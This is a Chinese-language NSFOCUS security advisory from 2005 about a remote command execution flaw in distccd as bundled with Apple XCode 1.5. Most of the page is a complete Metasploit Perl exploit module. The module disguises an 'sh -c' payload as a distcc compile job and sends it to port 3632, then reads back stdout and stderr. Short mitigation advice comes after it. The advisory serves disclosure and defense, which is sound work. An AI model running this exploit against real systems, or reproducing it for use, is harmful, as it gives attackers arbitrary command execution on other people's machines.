首页 -> 安全研究
安全研究
安全漏洞
XCode 1.5及distcc 2.x可能运行执行任意代码漏洞
发布日期:2005-03-10
更新日期:2005-03-11
受影响系统:
Apple XCode 1.5描述:
Samba distcc 2.x
distcc是用于在网络中多个机器间发布C、C++、Objective C或Objective C++代码的程序。
Apple捆绑的XCode 1.5允许分布式编译。这个功能实际上使用的是Samba distcc模块(http://distcc.samba.org)。 现在已有对distccd的攻击,允许远程攻击者以完全的用户级别访问目标机器。
XCode捆绑的是distcc的2.0.1版本。即使升级到2.18.3版本后仍存在类似的问题。
<*来源:Ray Slakinski (rays@sdf1.net)
Jason McLeod (jason@sdf1.net)
H D Moore (sflist@digitaloffense.net)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111047639409069&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::distcc_exec;
use base "Msf::Exploit";
use Pex::Text;
use strict;
my $advanced = { };
my $info =
{
'Name' => 'DistCC Daemon Command Execution',
'Version' => '$Revision: 1.6 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>'],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The distccd server port', 3632],
},
'Payload' => {
'Space' => 1024,
'Keys' => ['cmd', 'cmd_bash'],
},
'Description' => Pex::Text::Freeform(qq{
This module uses a documented security weakness to execute
arbitrary commands on any system running distccd.
}),
'Refs' => [ ['URL', 'http://distcc.samba.org/security.html'], ],
'Keys' => ['distcc'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $shellcode = $self->GetVar('EncodedPayload')->RawPayload;
my ($res, $len);
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $distcmd = $self->DistCommand("sh", "-c", $shellcode);
$s->Send($distcmd);
my $app = "DOTI0000000A"."METASPLOIT\n";
$s->Send($app);
$res = $s->Recv(24, 5);
if (! $res || length($res) != 24) {
$self->PrintLine("[*] The remote distccd did not reply to our request");
return;
}
# Check STDERR
$res = $s->Recv(4, 5);
$res = $s->Recv(8, 5);
$len = unpack('N', pack('H*', $res));
if ($len) {
$res = $s->Recv($len, 5);
foreach (split(/\n/, $res)) {
$self->PrintLine("stderr: $_");
}
}
# Check STDOUT
$res = $s->Recv(4, 5);
$res = $s->Recv(8, 5);
$len = unpack('N', pack('H*', $res));
if ($len) {
$res = $s->Recv($len, 5);
foreach (split(/\n/, $res)) {
$self->PrintLine("stdout: $_");
}
}
}
sub DistCommand {
my $self = shift;
# convince distcc that this is a compile
push @_, "#";
push @_, "-c";
push @_, "main.c";
push @_, "-o";
push @_, "main.o";
# set distcc 'magic fairy dust' and argument count
my $res = "DIST00000001".sprintf("ARGC%.8x", scalar(@_));
# set the arguments
foreach (@_) {
$res .= sprintf("ARGV%.8x%s", length($_), $_);
}
return $res;
}
1;
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 使用XCode中分布式编译系统的用户应禁用这个功能,直到Apple和Samba采取了适当的保护措施。
厂商补丁:
Samba
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.samba.org/
浏览次数:2790
严重程度:0(网友投票)
绿盟科技给您安全的保障